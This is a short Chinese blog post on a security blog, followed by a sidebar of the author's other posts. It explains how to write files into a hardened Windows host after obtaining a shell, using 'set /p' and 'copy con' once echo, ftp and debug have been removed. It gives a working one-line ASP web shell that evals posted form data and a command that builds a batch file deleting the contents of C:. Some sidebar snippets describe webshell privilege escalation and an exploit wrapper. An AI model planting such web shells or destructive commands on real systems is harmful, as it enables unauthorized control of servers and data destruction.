假如我比对方BT(ALLyeSNO)

最新推荐文章于 2019-02-16 12:47:42 发布
最新推荐文章于 2019-02-16 12:47:42 发布
阅读量1.3k 收藏
点赞数
分类专栏: Bat Man 原创文章 文章标签: bt javascript web服务 server shell c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/freexploit/article/details/147667
版权
利用安全策略禁止本地主机连接去对方任何端口!
然后在允许别人连接自己的80端口!
把debug/ftp/tftp/its/start/net/net1/echo/edit去掉!本地只提供web服务!
关闭/过滤所有端口,现在得到这个主机一个shell,有办法上穿文件?

呵呵 改内核去掉了echo?

别怕 我们还有set 嘛

set/p allyesno=del c:/.>allyesno.bat

如果遇到转义字符就是^了 嘎嘎。。。

set/p allyesno=^<SCRIPT RUNAT^=SERVER LANGUAGE^=JAVASCRIPT^>eval^(Request.form^('^#'^)+''^)^</SCRIPT^>>allyesno.asp

续假如对方是个BT
more>allyesno.asp
copy con allyesno.asp

结尾要以ctrl+Z结束 按F6不行

可以输入任意代码(包括回车) 如果是以com作为后缀
还可以 写成可执行文件(不用debug,嘎嘎 写法自己思索一下)
freexploit
关注
专栏目录
ALLyeSNO 优化版浩方 第二版 Ver 2007 06 15 清除广告 自动挤房间
qq_43667702的博客
02-24 329
ALLyeSNO 优化版浩方 第二版 Ver 2007 06 15 清除广告 自动挤房间
bat版鸡鸡管理器 【ALLyeSNO
FreeXploiT
05-07 2414
Term   : FreeXploiT Author : ALLyeSNODate   : 2005-5-8仿照kevin1986的vb版肉肉管理器的bat版鸡鸡管理器kevin这个工具蛮好玩的,其中直接调用了mstsc文件引起了我的兴趣,采用的方式可以有以下几种1。vb有现成的终端连接控件,直接添加使用2。捕获mstsc的窗口再从mdb读取信息添加3。存在命令行的发送形式,以此调用如果要写bat
假如对方是个BT(ALLyeSNO)
FreeXploiT
10-15 1184
利用安全策略禁止本地主机连接去对方任何端口! 然后在允许别人连接自己的80端口! 把debug/ftp/tftp/its/start/net/net1/echo/edit去掉!本地只提供web服务! 关闭/过滤所有端口,现在得到这个主机一个shell,有办法上穿文件? 呵呵 改内核去掉了echo? 别怕 我们还有set 嘛 set/p allyesno=del c:/.>allyesno.bat
我对CSDN BLOG的一些想法 【ALLyeSNO
FreeXploiT
05-15 1965
thx 韩磊先生作出的回复 我的一些想法韩磊先生也常到donews blog看吧 虽然可能donews blog程序上比csdn的低一个版本但看上去 至少是看上去 发贴数量 频度 以及 质量要比csdn的高一些 我是指普通的网友blogCSDN毕竟是编程论坛 要跟CSDN比纯粹的技术 是不大可能的对于blog的系统开发 韩磊先生以及各位开发人员一定非常熟稔 非常精通不过对blog是什么
枚举驱动器 (ALLyeSNO)
FreeXploiT
12-15 1435
FreeXploiT原创文章原理: if 命令不能用于直接测试目录,但空 (NUL) 设备确实存在于每个目录中。因此,可以通过测试零设备确定目录是否存在。以下范例可测试目录的存在:if exist c:mydir/nul goto process @echo offrem test in win2K&winXP by ALLyeSNOclsfor %%i in (C,D,E,F,G,H,I
梦(ALLyeSNO)
FreeXploiT
03-27 1375
文:ALLyeSNO昨天晚上又做梦了有趣的是 这梦是上个星期那梦的续集 听说有的人做了梦以后那是一点都想不起来的 我比较受伤一点我做的都嘛是感伤的梦梦的内容 就像一部神妙的小说 中间穿插着一个感情的故事 让我感伤的 却又是情现实中我对感情那是麻木了 却没想到在梦里重新拾回这揪心的感觉 是在梦里对现实的渴望?是现实中无法实现而要在梦中冲破枷锁 宣泄自己? 我清醒的否认 但潜意识或者正在对此点头昨晚还
PingX(ALLyeSNO)
FreeXploiT
10-15 1568
rem pingx.bat bulid by ALLyeSNO@echo offecho use:pingx windowsnumber ipecho ex:pingx 20 127.0.0.1if "%1"=="" echo 请输入你要打开的窗口数目&&goto :eofif "%2"=="" echo 你没有输入ip地址&&goto :eoffor /l %%i in (1,1,%1) do
CSDN 韩磊 外传 【ALLyeSNO
FreeXploiT
05-13 1914
话说 CSDN 的 韩磊 死后去了天堂,被上帝召去面试,说是让他主持天堂的 BLOG 系统开发工作,韩磊欣喜若狂很高兴,上帝问他:你智商有160吗?我们研究一下DONEWS BLOG,韩磊说没有;上帝又问:那么你智商有140吗?我们可以探讨一下MSN 空间,韩磊说没有;上帝有点失望,继续问:那么120有吗?我们讨论讨论新浪 也行啊,韩磊还是说没有;上帝没办法,继续问:100、100总有
越夜月美丽(ALLyeSNO)
FreeXploiT
11-14 1170
每个月夜来临的时候 我总爱坐在微风吹来的凉台上 望着黑夜有些凉意 渐渐地 努力地想使心变得温暖 却有一阵阵刺痛是我太用力了 是我太刻意了。。。或许 或许 或许 会有那么一天的尽管 我不确定 但我却期待 向往
MD5加强验证 挑战王小云破解 【 ALLyeSNO
FreeXploiT
05-30 3907
Author : allyesnoTeam   : freexploitDate     : 2006-05-30做梦想到了一个加强md5验证的方法 醒来了赶紧测试一下地球人都知道MD5 被王小云破了!!!破了!!!破了!!!破了!!!破~~(shut up)其实不是破了而是用他们的算法,在数个小时内就可以找到MD5碰撞。就是你用一台IBM P690数小时内能创造出两个MD5相同 内容
用批处理实现文本文件中指定字符串的替换 zz
qq_43667702的博客
02-16 2037
用批处理实现文本文件中指定字符串的替换 zz
CMD下修改注册表 完全攻略(FreeXploiT搜集 整理 热荐)
FreeXploiT
11-26 2716
ALLyeSNO注:先来段精彩的【 本文未包含zzzevazzz 写的do all in cmd 里面使用inf 修改注册表的 方法 】regedit虽是gui下使用的东东 但其实是有未公开的参数的 可以在cmd下使用regedit的运行参数REGEDIT [/L:system] [/R:user] filename1REGEDIT [/L:system] [/R:user] /C filenam
WEBSHELL权限提升(菜菜)
FreeXploiT
10-15 8665
动网上传漏洞,相信大家拿下不少肉鸡吧,但是都是WEBSHELL,不能拿到系统权限,要如何拿到系统权限呢?这正是我们这次要讨论的内容OK,进入我的WEBSHELL              啊哈,不错,双CPU,速度应该跟的上,不拿下你我怎么甘心啊输入密码,进入到里面看看,有什么好东西没有,翻了下,好像也没有什么特别的东西,看看能不能进到其他的盘符,点了下C盘,不错不错,可以进去,这样提升就大有希望
ALLyeSNO 优化版浩方 第二版 Ver:2007.06.15 清除广告 自动挤房间
FreeXploiT
06-15 8551
allyesno 优化版浩方 第二版 Ver:2007.06.15 正式发布ALLyeSNO优化版浩方 2007.06.151.按Ctrl+F1挤房间 按Ctrl+F2停止挤房间 (一般情况下会自动停止 无需按Ctrl+F2停止)2.可以挤浩方对战平台的任意房间,包括浩方大厅房间,浩方引擎房间,CS房间注:如果进去游戏后 再次挤房间 我只测试了反恐大联盟的CS版本 其他CS版本没有测试过 所以
FreeXploiT 成立三年感言!
FreeXploiT
01-11 8268
 04年成立的,和一个朋友,现在那个朋友不知所踪了(他叫菜菜,很早就玩汇编了)后来的两年基本是我一个人更新里面的blog我这个算是最早的安全聚合blog吧? 暗礁的也挺早 不过是团队形式的 鬼仔的05年 neeao的04.10.26我的04.10.15那时候就是想弄点资料自己收藏着看看 ,当然也有很长远的目标 就是想做一个网站 先拿blog练练手一练就是三年啊 哈。。blo
迅速删除非法文件名代码的 0day 呵呵
FreeXploiT
11-12 7721
allyesno:我们会遇到很多所谓非法的文件名例如 .. con nul 等等FlowerCode 给出了以下方法可以快速删除这些文件名http://hi.baidu.com/flowercode/blog/item/3f68be02a7cfd10d4bfb519f.html 两行代码搞定,迅速删除使用非法文件名的文件及文件夹  2007年06月04日 星期一 19:08
fuckipb batShell
FreeXploiT
04-29 6957
这个exploit是在0x557.cn irc room superhei 那里得知的 thx exp的核心是ipb0day.exe 这个fuckipb.bat 只是batShell 运行情况输入网站地址 例如 http://www.ph4nt0m.org/ipbbbs/ 你就输入 www.ph4nt0m.org输入网站地址:bbs.null.com输入论坛目录 例如 http://www.ph4
CMD记录器改良版
FreeXploiT
09-29 6676
 文章作者:a11yesno 信息来源:邪恶八进制信息安全团队(www.eviloctal.com)改的不是很良 勉强可用 或许应该弄多一点容错代码 体力活啊。。安装 把代码保存为cmd.bat 放置system32下 把cmd.exe copy为cmd.gif 注册表 添加 HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/Curren
regini 可是一个好用强大的工具!
FreeXploiT
01-18 6119
My site: http://blog.csdn.net/freexploit/regini 可是一个好用强大的工具!我仔细查阅了 微软的资料 发现说的含糊不清 google了下也是 寥寥几笔这个玩意主要用途是 在cmd下 修改注册表 以及 注册表权限!用法研究了一晚上 弄出来了 ,微软上写的 根本不能用啊 郁闷。。使用方法C:/>regini regset.ini 就行啦regset.ini
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值